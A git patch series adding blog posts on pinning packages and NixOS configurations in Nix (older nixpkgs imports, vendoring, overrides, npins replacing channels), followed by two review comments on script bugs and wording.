+++ b/content/posts/flakes-arent-real.md 
@@ -454,6 +454,12 @@ actually invoking `nixpkgs.lib.nixosSystem`. The latter is the much more sinister part, and the reason I would strongly recommend inline modules with closures instead of `specialArgs`: they break flake composition. +That being said, *either* using `specialArgs` *or* an inline module inside +`flake.nix`, rather than an option above, is the only way to inject module +imports. That is, if one uses some option like `imports = [ config.someOption +]`, it will cause an infinite recursion error. We would suggest putting the +imports inside an inline module inside `flake.nix` for this case. + To use `specialArgs`, an attribute set is passed into `nixpkgs.lib.nixosSystem`, which then land in the arguments of NixOS modules: From 1f33d774c2310081fc5e648881162df93143d8d4 Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Mon, 8 Apr 2024 19:41:41 -0700 Subject: [PATCH 08/10] draft --- content/posts/pinning-packages-in-nix.md | 152 +++++++++++++++++++++++ 1 file changed, 152 insertions(+) create mode 100644 content/posts/pinning-packages-in-nix.md diff --git a/content/posts/pinning-packages-in-nix.md b/content/posts/pinning-packages-in-nix.md new file mode 100644 index 0000000..eca3419 --- /dev/null +++ b/content/posts/pinning-packages-in-nix.md 
@@ -0,0 +1,152 @@ ++++ +date = "2024-04-02" +draft = true +path = "/blog/pinning-packages-in-nix" +tags = ["nix"] +title = "Pinning packages in Nix" ++++ + +Although Nix supposedly makes pinning things easy, it really does not seem so: +it is not possible to simply write `package = "^5.0.1"` in some file somewhere +and get *one* package pinned at a specific version. Though this is frustrating, +there is a reason for this, and it primarily speaks to how nixpkgs is a Linux +distribution and is unlike a standard language package manager. + +This post will go through the ways to pin a package to some older version and +why one would use each method. + +## FIXME +mention that these methods can generally be overlayed. mention that overlaying +*across different nixpkgs* is probably a bad idea + +# Simply add an older version of nixpkgs + +> Software regressed? No patches in master to fix it? Try 30-40 different + versions of nixpkgs. An easy weeknight bug fix. You will certainly not regret + pinning 30-40 versions of nixpkgs. + +Unlike most systems, it is fine to mix versions of nixpkgs, although it will +likely go wrong if, e.g. libraries are intermingled between versions. But, if +one package is all that is necessary, one can in fact simply import another +version of nixpkgs. + +This works because binaries from multiple versions of nixpkgs can coexist +on a computer and simply work. However, it can go wrong if they are loading +libraries at runtime, especially if the glibc version changes, especially if +`LD_LIBRARY_PATH` is involved. That failure mode is, however, rather loud and +obvious if it happens. 
+ +For example: + +```nix +let + pkgs1Src = builtins.fetchTarball { + # https://github.com/nixos/nixpkgs/tree/nixos-23.11 + url = "https://github.com/nixos/nixpkgs/archive/219951b495fc2eac67b1456824cc1ec1fd2ee659.tar.gz"; + sha256 = "sha256-u1dfs0ASQIEr1icTVrsKwg2xToIpn7ZXxW3RHfHxshg="; + name = "source"; + }; + + pkgs2Src = fetchTarball { + # https://github.com/nixos/nixpkgs/tree/nixos-unstable + url = "https://github.com/nixos/nixpkgs/archive/d8fe5e6c92d0d190646fb9f1056741a229980089.tar.gz"; + sha256 = "sha256-iMUFArF0WCatKK6RzfUJknjem0H9m4KgorO/p3Dopkk="; + name = "source"; + }; + + pkgs1 = import pkgs1Src { }; + pkgs2 = import pkgs2Src { }; + +in +{ + env = pkgs1.buildEnv { + name = "env"; + paths = [ pkgs1.vim pkgs2.hello ]; + }; + + vim1 = pkgs1.vim; + vim2 = pkgs2.vim; +} +``` + +Here we have an environment which is being built out of packages from two +different versions of nixpkgs, so that `result/bin/hello` is from `pkgs2` and +`result/bin/vim` is from `pkgs1`. This can equivalently be done for +`environment.systemPackages` or similar such things: to get another version of +nixpkgs into a NixOS configuration, one can: + +- For flakes, one can inject the dependency [in some manner suggested by + "Flakes aren't real"][flakes-arent-real]. Or, one can do the + `builtins.fetchTarball` thing above. +- For non-flakes, one can do the `builtins.fetchTarball` thing shown above, or + add another input in [`npins`][npins]/Niv/etc, or add a second channel + (though we suggest migrating NixOS configs using channels to npins or + flakes so that the nixpkgs version is tracked in git). 
+ +[flakes-arent-real]: https://jade.fyi/blog/flakes-arent-real/ +[npins]: https://github.com/andir/npins + +``` + » nix-build -A env /tmp/meow.nix +/nix/store/zilav8lqqgfgrk54wg88mdwq582hqdp9-env + +~ » ./result/bin/hello --version | head -n1 +hello (GNU Hello) 2.12.1 + + » ./result/bin/vim --version | head -n3 +VIM - Vi IMproved 9.0 (2022 Jun 28, compiled Jan 01 1980 00:00:00) +Included patches: 1-2116 +Compiled by nixbld + + » nix eval -f /tmp/meow.nix vim1.version +"9.0.2116" + + » nix eval -f /tmp/meow.nix vim2.version +"9.1.0148" +``` + +
+
Difficulty
+
Very easy
+
Rebuilds
+
+None, but will bring in another copy of nixpkgs and any dependencies (and +transitive dependencies). +
+
+ +# Vendor the package + +Another way to pin one package is to vendor the package definition of the +relevant version. The easiest way to do this is to find the version of nixpkgs +with the desired package version and then copy the `package.nix` or +`default.nix` or such into your own project, and then call it with +`callPackage`. + +
+
Difficulty
+
Slight effort
+
Rebuilds
+
+None, but will bring in another copy of nixpkgs and any dependencies (and +transitive dependencies). +
+
+ +# Patch the package with overrides + +maybe explain what .override does + +## Limitations + +go and rust bustedness +link to the architecture issue + +# Patch a NixOS module + +disable modules thing + +# Patch the base system without a world rebuild + +xz etc + From 4d833234518bd2296f23c84f85d057c7b41ce75e Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Sun, 19 May 2024 19:10:35 -0700 Subject: [PATCH 09/10] pinning nix things --- content/posts/pinning-packages-in-nix.md | 200 ++++++++++++++++++++--- 1 file changed, 179 insertions(+), 21 deletions(-) diff --git a/content/posts/pinning-packages-in-nix.md b/content/posts/pinning-packages-in-nix.md index eca3419..05bef38 100644 --- a/content/posts/pinning-packages-in-nix.md +++ b/content/posts/pinning-packages-in-nix.md 
@@ -1,24 +1,21 @@ +++ -date = "2024-04-02" -draft = true +date = "2024-05-19" +draft = false path = "/blog/pinning-packages-in-nix" tags = ["nix"] title = "Pinning packages in Nix" +++ -Although Nix supposedly makes pinning things easy, it really does not seem so: -it is not possible to simply write `package = "^5.0.1"` in some file somewhere -and get *one* package pinned at a specific version. Though this is frustrating, -there is a reason for this, and it primarily speaks to how nixpkgs is a Linux -distribution and is unlike a standard language package manager. +Although Nix supposedly makes pinning things easy, it really does not seem so +from a perspective of looking at other software using pinning: it is not +possible to simply write `package = "^5.0.1"` in some file somewhere and get +*one* package pinned at a specific version. Though this is frustrating, there +is a reason for this, and it primarily speaks to how nixpkgs is a Linux +distribution and how Nix is unlike a standard language package manager. This post will go through the ways to pin a package to some older version and why one would use each method. -## FIXME -mention that these methods can generally be overlayed. mention that overlaying -*across different nixpkgs* is probably a bad idea - # Simply add an older version of nixpkgs > Software regressed? No patches in master to fix it? Try 30-40 different 
@@ -26,9 +23,11 @@ mention that these methods can generally be overlayed. mention that overlaying pinning 30-40 versions of nixpkgs. Unlike most systems, it is fine to mix versions of nixpkgs, although it will -likely go wrong if, e.g. libraries are intermingled between versions. But, if -one package is all that is necessary, one can in fact simply import another -version of nixpkgs. +likely go wrong if, e.g. libraries are intermingled between versions (*in +particular*, it is inadvisable to replace some program with a version +from a different nixpkgs from within an overlay for this reason). But, if one +package is all that is necessary, one can in fact simply import another version +of nixpkgs. This works because binaries from multiple versions of nixpkgs can coexist on a computer and simply work. However, it can go wrong if they are loading @@ -123,30 +122,189 @@ with the desired package version and then copy the `package.nix` or `default.nix` or such into your own project, and then call it with `callPackage`. +You can find it with something like: + +``` + » nix eval --raw -f '' hello.meta.position +/nix/store/0qd773b63yg8435w8hpm13zqz7iipcbs-source/pkgs/by-name/he/hello/package.nix:41 +``` + +Or, equivalently, with `nix repl -f ''`, `:e hello` or to do the same +as above, `hello.meta.position`. + +Then, vendor that file into your configurations repository. + +Once it is vendored, it can be used either from an overlay: + +```nix +final: prev: { + hello = final.callPackage ./hello-vendored.nix { }; +} +``` + +or directly in your use site: + +```nix +{ pkgs, ... }: { + environment.systemPackages = [ + (pkgs.callPackage ./vendored-hello.nix { }) + ]; +} +``` + +
Difficulty
Slight effort
Rebuilds
-None, but will bring in another copy of nixpkgs and any dependencies (and -transitive dependencies). +For the overlay use case, this will build the overridden package and anything +depending on it. For the direct at use site case, this will just rebuild the +package, and anything depending on it will get the version in upstream nixpkgs.
# Patch the package with overrides -maybe explain what .override does +nixpkgs offers several separate methods to "override" things that mean +different things. In short: + +- [`somePackage.override`][override] replaces the dependencies of a package; + more specifically the dependencies injected by `callPackage`. It accepts an + attribute set but can also accept a lambda of one argument, providing the + previous dependencies of the package. +- [`somePackage.overrideAttrs`][overrideAttrs] replaces the `stdenv.mkDerivation` + arguments of a package. This lets you replace the `src` of a package, in + principle. +- [`overrideCabal`][overrideCabal] replaces the `haskellPackages.mkDerivation` + arguments for a Haskell package in a similar way that `overrideAttrs` does for + `stdenv.mkDerivation`. This is internally implemented by methods equivalent + to the evil crimes below. + +[override]: https://nixos.org/manual/nixpkgs/stable/#sec-pkg-override +[overrideAttrs]: https://nixos.org/manual/nixpkgs/stable/#sec-pkg-overrideAttrs +[overrideCabal]: https://nixos.org/manual/nixpkgs/stable/#haskell-overriding-haskell-packages + +Here are some examples: + +Build an openttd with a different upstream source by putting this in +`openttd-jgrpp.nix`: + +```nix +{ openttd, fetchFromGitHub }: +openttd.overrideAttrs (old: { + src = fetchFromGitHub { + owner = "jgrennison"; + repo = "openttd-patches"; + rev = "jgrpp-0.57.1"; + sha256 = "sha256-mQy+QdhEXoM9wIWvSkMgRVBXJO1ugXWS3lduccez1PQ="; + }; +}) +``` + +then `pkgs.callPackage ./openttd-jgrpp.nix { }`. 
+ +For instance, the following (rather silly) command will build such a file: + +``` + » nix build -L --impure --expr 'with import {}; callPackage ./openttd-jgrpp.nix {}' +``` ## Limitations -go and rust bustedness -link to the architecture issue +Most notably, [overrideAttrs doesn't work][overrideAttrs-busted] on several +significant language ecosystems including Rust and Go, since one almost always +needs to override the arguments of `buildRustPackage` or `buildGoPackage` when +replacing something. For these, either one can do crimes to introduce an +`overrideRust` function (see below), or one can cry briefly and then vendor the +package. The latter is easier. + +```nix +let + pkgs = import { }; + # Give the package a fake buildRustPackage from callPackage that modifies the + # arguments through a function. + overrideRust = f: drv: drv.override (oldArgs: + let rustPlatform = oldArgs.rustPlatform or pkgs.rustPlatform; + in oldArgs // { + rustPlatform = rustPlatform // { + buildRustPackage = args: rustPlatform.buildRustPackage (f args); + }; + }); + + # Take some arguments to buildRustPackage and make new ones. In this case, + # override the version and the hash + evil = oldArgs: oldArgs // { + src = oldArgs.src.override { + rev = "v0.20.9"; + sha256 = "sha256-NxWqpMNwu5Ajffw1E2q9KS4TgkCH6M+ctFyi9Jp0tqQ="; + }; + version = "master"; + # FIXME: if you are actually doing this put a real hash here + cargoSha256 = pkgs.lib.fakeHash; + }; + +in +{ + x = overrideRust evil pkgs.tree-sitter; +} +``` + +[overrideAttrs-busted]: https://github.com/NixOS/nixpkgs/issues/99100 + +Then: `nix build -L -f evil.nix x` + +
+
Difficulty
+
Highly variable, sometimes trivial, sometimes nearly impossible, depending +on architectural flaws of nixpkgs.
+
Rebuilds
+
+For the overlay use case of actually using this overridden package, this will +build the overridden package and anything depending on it. For the direct at +use site case, this will just rebuild the package, and anything depending on it +will get the version in upstream nixpkgs. +
+
# Patch a NixOS module -disable modules thing +If one wants to replace a NixOS module, say, by getting it from a later version +of nixpkgs, see [Replacing Modules] in the NixOS manual. + +[Replacing Modules]: https://nixos.org/manual/nixos/stable/#sec-replace-modules # Patch the base system without a world rebuild -xz etc +It's possible to replace an entire store path with another inside a NixOS +system without rebuilding the world (but wasting some space (by duplicating +things for the rewritten version) and being somewhat evil/potentially unsound +since it is just a text replacement of the hashes). This can be achieved with +the NixOS option +[`system.replaceRuntimeDependencies`][replaceRuntimeDependencies]. + +[replaceRuntimeDependencies]: https://nixos.org/manual/nixos/stable/options#opt-system.replaceRuntimeDependencies + +# Why do we need all of this? + +The primary reason that Nix doesn't allow trivially overriding packages with a +different version is that it is a generalized build system building software +that has non-uniform expectations of how to be built. One can in indeed see +that the "replace one version with some other in some file" idea is *almost* +reality in languages using `mkDerivation` directly, though one might have to +tweak other build properties sometimes. Architectural problems in nixpkgs +prevent this working for several ecosystems. + +Another sort of issue is that nixpkgs tries to provide a mostly [globally +coherent] set of software versions, where, like most Linux distributions, there +is generally one blessed version of a library with some exceptions. This is, in +fact, mandatory to be able to have any cache hits as a hermetic build system: +if everyone was building slightly different versions of libraries, all +downstream packages will have different hashes and thus miss the cache. 
+ +So, in a way, a software distribution based on Nix cannot have separate locking +for every package and simultaneously have functional caches: the moment that +everything is not built together, caches will miss. + +[globally coherent]: https://www.haskellforall.com/2022/05/the-golden-rule-of-software.html From 07074b5345b863bf3b157cbc782de531359a4d21 Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Mon, 20 May 2024 13:42:40 -0700 Subject: [PATCH 10/10] Pinning nixos with npins --- content/posts/pinning-nixos-with-npins.md | 368 ++++++++++++++++++++++ content/posts/pinning-packages-in-nix.md | 6 +- 2 files changed, 371 insertions(+), 3 deletions(-) create mode 100644 content/posts/pinning-nixos-with-npins.md diff --git a/content/posts/pinning-nixos-with-npins.md b/content/posts/pinning-nixos-with-npins.md new file mode 100644 index 0000000..82f8537 --- /dev/null +++ b/content/posts/pinning-nixos-with-npins.md @@ -0,0 +1,368 @@ ++++ +date = "2024-05-20" +draft = false +path = "/blog/pinning-nixos-with-npins" +tags = ["nix"] +title = "Pinning NixOS with npins, or how to kill channels forever without flakes" ++++ + +> Start of Meetup: "hmm, Kane is using nixos channels, that's not good, it's going to gaslight you"
+> 6 hours later: Utterly bamboozled by channels
+> 6.5 hours later: I am no longer using channels + +\- [@riking@social.wxcafe.net](https://social.wxcafe.net/@riking/112465844452065776) + +Nix channels, which, just like Nix, is a name overloaded to mean several +things, are an excellent way to confuse and baffle yourself with a NixOS +configuration by making it depend on uncontrolled and confusing external +variables rather than being self-contained. You can see [an excellent +explanation of the overloaded meanings of "channels" at samueldr's +blog][samueldr-channels]. In this post I am using "channels" to refer to the +`nix-channel` command that many people to manage what `` points to, +and thus control system updates. + +[samueldr-channels]: https://samuel.dionne-riel.com/blog/2024/05/07/its-not-flakes-vs-channels.html + +It is a poorly guarded secret in NixOS that `nixos-rebuild` is simply a bad +shell script; you can [read the sources here][nixos-rebuild]. I would even go +so far as to argue that it's a bad shell script that is a primary contributor +to flakes gaining prominence, since its UX on flakes is so much better: flakes +don't have the `/etc/nixos` permissions problems *or* the pains around pinning +that exist in the default non-flakes `nixos-rebuild` experience. We rather owe +it to our users to produce a better build tool, though, because `nixos-rebuild` +is *awful*, and there are currently the beginnings of efforts in that direction +by people including samueldr; `colmena` is also an example of a better build +tool. + +Both the permissions issue and the pinning are extremely solvable problems +though, which is the subject of this post. [Flakes have their +flaws][samueldr-flakes] and, more to the point, plenty of people just don't +want to learn them yet, and nobody has yet met people where they are at with +respect to making this simplification *without* doing it with flakes. + +This is ok! 
Let's use something more understandable that does the pinning part +of flakes and not worry about the other parts. + +[samueldr-flakes]: https://samuel.dionne-riel.com/blog/2023/09/06/flakes-is-an-experiment-that-did-too-much-at-once.html + +This blog post teaches you how to move your NixOS configuration into a repo +wherever you want, and eliminate `nix-channel` altogether, instead pinning the +version of `` and NixOS in a file in your repo next to your config. + +[nixos-rebuild]: https://github.com/nixos/nixpkgs/blob/b5c90bbeb36af876501e1f4654713d1e75e6f972/pkgs/os-specific/linux/nixos-rebuild/nixos-rebuild.sh + +# Background: what NixOS builds actually do + +First, let's say how NixOS builds actually work, skipping over all the remote +build stuff that `nixos-rebuild` also does. + +For non-flakes, `` is evaluated; that is, [`nixos/default.nix`][nixos-defaultnix] in +``. This resolves the `NIX_PATH` entry `` as the first +user-provided NixOS module to evaluate, or alternatively +`/etc/nixos/configuration.nix` if that doesn't exist. For flake configurations, +substitute `yourflake#nixosConfigurations.NAME` in your head in place of +``. + +[nixos-defaultnix]: https://github.com/nixos/nixpkgs/blob/6510ec5acdd465a016e5671ffa99460ef70e6c25/nixos/default.nix + +The default `NIX_PATH` is the following: + +``` +nix-path = $HOME/.nix-defexpr/channels nixpkgs=/nix/var/nix/profiles/per-user/root/channels/nixpkgs /nix/var/nix/profiles/per-user/root/channels +``` + +That is to say, unless it's been changed, `` will reference root's +channels, managed with `nix-channel`. + +Next, the attribute `config.nix.package` of `` is evaluated then +built/downloaded (!!) unless it is a flake config (or `--no-build-nix` or +`--fast` is passed). Then the attribute `config.system.build.nixos-rebuild` is +likewise evaluated and the `nixos-rebuild` is re-executed into the one from the +future configuration instead of the one from the current configuration, unless +`--fast` is passed. 
+ +Once your configuration has been evaluated once or twice pointlessly, it is +evaluated a third time, for the attribute `config.system.build.toplevel`, and +that is built to yield the new system generation. + +This derivation is what becomes `/run/current-system`: it contains a bunch of +symlinks to everything that forms that generation such as the kernel, initrd, +`etc` and `sw` (which is the NixOS equivalent of `/usr`). + +Finally, `the-build-result/bin/switch-to-configuration` is invoked with an +argument `switch`, `dry-activate`, or similar. + +--- + +From this information, one could pretty much write a NixOS build tool: it really is +just `nix build -f '' config.system.build.toplevel` (in old +syntax, `nix-build '' -A config.system.build.toplevel`), then +`result/bin/switch-to-configuration`. That's all it does. + +# Background: what is npins anyway? + +[`npins`][npins] is the spiritual successor to [niv], the venerable Nix pinning +tool many people used before switching to flakes. But what is a pinning tool +for Nix anyway? It's just a tool that finds the latest commit of something, +downloads it, then stores that commit ID and the hash of the code in it in a +machine-readable lock file that you can check in. When evaluating your Nix +expressions, they can use `builtins.fetchTarball` to obtain that exact same +code every time. + +That is to say, a pinning tool lets you avoid having to copy paste Git commit +IDs around, and ultimately does something like this in the end, which hands you +a path in the Nix store with the code at that version. + +```nix +builtins.fetchTarball { + # https://github.com/lix-project/lix/tree/main + url = "https://github.com/lix-project/lix/archive/992c63fc0b485e571714eabe28e956f10e865a89.tar.gz"; + sha256 = "sha256-L1tz9F8JJOrjT0U6tC41aynGcfME3wUubpp32upseJU="; + name = "source"; +}; +``` + +Let's demystefy how pinning tools work by writing a trivial one in a couple of +lines of code. 
+ +First, let's find the latest commit of nixos-unstable with `git ls-remote`: + +``` +~ » git ls-remote https://github.com/nixos/nixpkgs nixos-unstable +4a6b83b05df1a8bd7d99095ec4b4d271f2956b64 refs/heads/nixos-unstable +~ » git ls-remote https://github.com/nixos/nixpkgs nixos-unstable | cut -f1 +4a6b83b05df1a8bd7d99095ec4b4d271f2956b64 +``` + +Then we can construct an archive URL for that commit ID, and fetch it into the +Nix store: + +``` +~ » nix-prefetch-url --name source --unpack https://github.com/nixos/nixpkgs/archive/4a6b83b05df1a8bd7d99095ec4b4d271f2956b64.tar.gz +0zmyrxyrq6l2qjiy4fshjvhza6gvjdq1fn82543wb2li21jmpnpq +``` + +And finally fetch it from a Nix expression: + +``` +~ » nix repl +Lix 2.90.0-lixpre20240517-0d2cc81 +Type :? for help. +nix-repl> nixpkgs = builtins.fetchTarball { url = "https://github.com/nixos/nixpkgs/archive/4a6b83b05df1a8bd7d99095ec4b4d271f2956b64.tar.gz"; name = "source"; sha256 = "0zmyrxyrq6l2qjiy4fshjvhza6gvjdq1fn82543wb2li21jmpnpq"; } +nix-repl> nixpkgs +"/nix/store/0aavdx9m5ms1cj5pb1dx0brbrbigy8ij-source" +``` + +This is essentially exactly what npins does, minus the part of saving the +commit ID and hash into `npins/sources.json`. + +We could write a simple shell script to do this, perhaps called +`./bad-npins.sh`: + +```bash +#!/usr/bin/env bash + +name=nixpkgs +repo=https://github.com/nixos/nixpkgs +branch=nixos-unstable + +tarballUrl="$repo/archive/$(git ls-remote "$repo" nixos-unstable | cut -f1)" +sha256=$(nix-prefetch-url --name source --unpack "$tarballUrl") + +# initialize sources.json if not present +[[ ! 
-f sources.json ]] && echo '{}' > sources.json + +# use sponge from moreutils to deal with jq not having the buffering to safely +# do in-place updates +< sources.json jq --arg sha256 "$sha256" --arg url "$tarballUrl" --arg name "$name" \ + '.[$name] = {sha256: $sha256, url: $url}' \ + | sponge sources.json +``` + +and then from Nix we can load the sources: + +```nix +let + srcs = builtins.fromJSON (builtins.readFile ./sources.json); + fetchOne = _name: { sha256, url, ... }: builtins.fetchTarball { + name = "source"; + inherit sha256 url; + }; +in +builtins.mapAttrs fetchOne srcs +``` + +Result: + +``` +~ » nix eval -f sources.nix +{ nixpkgs = "/nix/store/0aavdx9m5ms1cj5pb1dx0brbrbigy8ij-source"; } +``` + +We now have a bad pinning tool! I wouldn't recommend using this shell script, since +it doesn't do things like check if redownloading the tarball is necessary, but +it is certainly cute and it does work. + +`npins` is pretty much this at its core, but well-executed. + +[npins]: https://github.com/andir/npins +[niv]: https://github.com/nmattia/niv + +# Fixing the UX issues + +We know that: + +1. `` as seen by `nixos-rebuild` determines what version of nixpkgs + is used to build the configuration. +2. Where the configuration is is simply determined by `` +3. Both instances of duplicate configuration evaluation are gated on `--fast` + not being passed. + +So, we just have to invoke `nixos-rebuild` with the right options and +`NIX_PATH` such that we get a config from the current directory with a +`nixpkgs` version determined by `npins`. + +Let's set up npins, then write a simple shell script. + +``` +$ npins init --bare +$ npins add --name nixpkgs channel nixos-unstable +``` + +You can also use `nixos-23.11` (or future versions once they come out) in place +of `nixos-unstable` here, if you want to use a stable nixpkgs. + +Time for a simple shell script. 
Note that this shell script uses `nix eval`, +which we at *Lix* are very unlikely to ever break in the future, but it does +require `--extra-experimental-features nix-command` as an argument if you don't +have the experimental feature enabled, or +`nix.settings.experimental-features = "nix-command"` in a NixOS config. (The +experimental feature can be hacked around with +`nix-instantiate --json --eval npins/default.nix -A nixpkgs.outPath | jq -r .`, +which works around `nix-instantiate --eval` missing a `--raw` flag, but this is +kind of pointless since we are about to use flakes features in a second) + +```bash +#!/usr/bin/env bash + +cd $(dirname $0) + +# assume that if there are no args, you want to switch to the configuration +cmd=${1:-switch} +shift + +nixpkgs_pin=$(nix eval --raw -f npins/default.nix nixpkgs) +nix_path="nixpkgs=${nixpkgs_pin}:nixos-config=${PWD}/configuration.nix" + +# without --fast, nixos-rebuild will compile nix and use the compiled nix to +# evaluate the config, wasting several seconds +sudo env NIX_PATH="${nix_path}" nixos-rebuild "$cmd" --fast "$@" +``` + +# Killing channels + +Since building the config successfully, we can now kill channels to stop their +reign of terror, since we no longer need them to build the configuration at +all. Use `sudo nix-channel --list` and then `sudo nix-channel --remove +CHANNELNAME` on each one. While you're at it, you can also delete `/etc/nixos` +if you've moved your configuration to your home directory. + +Now we have a NixOS configuration built without using channels, but once we are +running that system, `` will still refer to a channel (or nothing, if +the channels are deleted), since we didn't do anything to `NIX_PATH` on the +running system. Also, the `nixpkgs` flake reference will point to the latest +`nixos-unstable` at the time of running a command like `nix run nixpkgs#hello`. +Let's fix both of these things. 
+ +For context, *by default*, on NixOS 24.05 and later, due to [PR +254405](https://github.com/NixOS/nixpkgs/pull/254405), *flake*-based NixOS +configs get pinned `` and a pinned `nixpkgs` flake of the exact same +version as the running system, such that `nix-shell -p hello` and `nix run +nixpkgs#hello` give you the same `hello` every time: it will always be the same +one as if you put it in `systemPackages`. That setup works by setting +`NIX_PATH` to refer to the flake registry `/etc/nix/registry.json`, which then +is set to resolve `nixpkgs` to `/nix/store/xxx-source`, that is, the nixpkgs of +the current configuration. + +We can bring the same niceness to non-flake configurations, with the exact same +code behind it, even! + +Let's fix the `NIX_PATH`. Add this module worth of code into your config +somewhere, say, `pinning.nix`, then add it to `imports` of `configuration.nix`: + +```nix +{ config, pkgs, ... }: +let sources = import ./npins; +in { + # We need the flakes experimental feature to do the NIX_PATH thing cleanly + # below. Given that this is literally the default config for flake-based + # NixOS installations in the upcoming NixOS 24.05, future Nix/Lix releases + # will not get away with breaking it. + nix.settings = { + experimental-features = "nix-command flakes"; + }; + + # FIXME(24.05 or nixos-unstable): change following two rules to + # + # nixpkgs.flake.source = sources.nixpkgs; + # + # which does the exact same thing, using the same machinery as flake configs + # do as of 24.05. + nix.registry.nixpkgs.to = { + type = "path"; + path = sources.nixpkgs; + }; + nix.nixPath = ["nixpkgs=flake:nixpkgs"]; +} +``` + +# New workflow + +When you want to update NixOS, use `npins update`, then `./rebuild.sh` +(`./rebuild.sh dry-build` to check it evaluates, `./rebuild.sh boot` to switch +on next boot, etc). If it works, commit it to Git. The version of nixpkgs comes +from exactly one place now, and it is tracked along with the changes to your +configuration. 
Builds are faster now since we don't evaluate the configuration +multiple times. + +Multiple machines can no longer get desynchronized with each other. Config +commits *will* build to the same result in the future, since they are +self-contained now. + +# Conclusion and analysis + +We really need to improve `nixos-rebuild` as the NixOS development community. +It embodies, at basically every juncture, obsolescent practices that confuse +users and waste time. Modern configurations should be using either +npins/equivalent or flakes, both of which should be equally valid and easy to +use choices in all our tooling. + +Flags like `--no-rebuild-nix` come from an era where people were building +flake-based configs from a Nix that didn't even *have* flakes, so they needed +to be able to switch to an entirely different *Nix* to be able to evaluate +their config. We should never be rebuilding Nix by default before re-evaluating +the configuration in 2024. The Nix language is much, much more stable these +days, almost frozen like a delicious ice cream cone, and so the idea of +someone's config requiring a brand new Nix to merely evaluate is bordering on +absurd. + +It doesn't help that this old flakes hack actually breaks cross compiling +NixOS configs, for which `--fast` is thus mandatory. The re-execution of +`nixos-rebuild` is more excusable since there is [still work to do on that like +capturing output to the journal](https://github.com/NixOS/nixpkgs/pull/287968), +but it is still kind of bothersome to eat so much evaluation time about it; I +wonder if a happier medium is that it would just build `pkgs.nixos-rebuild` +instead of evaluating all the modules, but that has its own drawback of ignoring +overlays in the NixOS config... 
+ +Another tool that [needs rewriting, documentedly +so](https://github.com/NixOS/nixpkgs/issues/293543) is `nixos-option`, which is +a bad pile of C++ that doesn't support flakes, and which could be altogether +replaced by a short bit of very normal Nix code and a shell script. + +There's a lot of work still to do on making NixOS and Nix a more friendly +toolset, and we hope you can join us. I (Jade) have been working along with +several friends on , a soon-to-be-released fork of CppNix +2.18 focused on friendliness, stability, and future evolution. People +in our community have been working on these UX problems outside Nix itself +as well. We would love for these tools to be better for everyone. diff --git a/content/posts/pinning-packages-in-nix.md b/content/posts/pinning-packages-in-nix.md index 05bef38..fa393d6 100644 --- a/content/posts/pinning-packages-in-nix.md +++ b/content/posts/pinning-packages-in-nix.md @@ -289,11 +289,11 @@ the NixOS option The primary reason that Nix doesn't allow trivially overriding packages with a different version is that it is a generalized build system building software -that has non-uniform expectations of how to be built. One can in indeed see +that has non-uniform expectations of how to be built. One can indeed see that the "replace one version with some other in some file" idea is *almost* -reality in languages using `mkDerivation` directly, though one might have to +reality in languages that use `mkDerivation` directly, though one might have to tweak other build properties sometimes. Architectural problems in nixpkgs -prevent this working for several ecosystems. +prevent this working for several ecosystems, though. Another sort of issue is that nixpkgs tries to provide a mostly [globally coherent] set of software versions, where, like most Linux distributions, there
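Review bot: in the `./bad-npins.sh` listing of content/posts/pinning-nixos-with-npins.md, `branch=nixos-unstable` is assigned but never read, because the `git ls-remote "$repo" nixos-unstable` call hardcodes the branch. `tarballUrl` also stops at the commit ID, while the manual `nix-prefetch-url` step just before it fetches `.../archive/<commit>.tar.gz`. Suggest `git ls-remote "$repo" "$branch"` and appending `.tar.gz` so the script matches the walkthrough. Since the script writes a pin file, a `set -euo pipefail` at the top would keep a failed `git ls-remote` or `nix-prefetch-url` from storing an empty commit ID or hash in sources.json. In the rebuild script, `cd $(dirname $0)` is unquoted and breaks on a checkout path containing spaces, and the script is not given a filename where it is introduced even though "New workflow" calls it `./rebuild.sh`. Smaller points in the same file: the background section names the flag `--no-build-nix` but the conclusion says `--no-rebuild-nix`, "demystefy" should be "demystify", and "that many people to manage" is missing a verb.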
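Review bot: in the content/posts/pinning-packages-in-nix.md hunk, the new trailing ", though" on "prevent this working for several ecosystems, though." lands one sentence after "though one might have to tweak other build properties sometimes", so the paragraph now has a concessive "though" in two consecutive sentences. Consider dropping the added one or rewording the earlier clause. These copy-edits are also unrelated to the subject line "Pinning nixos with npins"; either mention them in the commit message or split them into their own commit so the history of that post stays searchable.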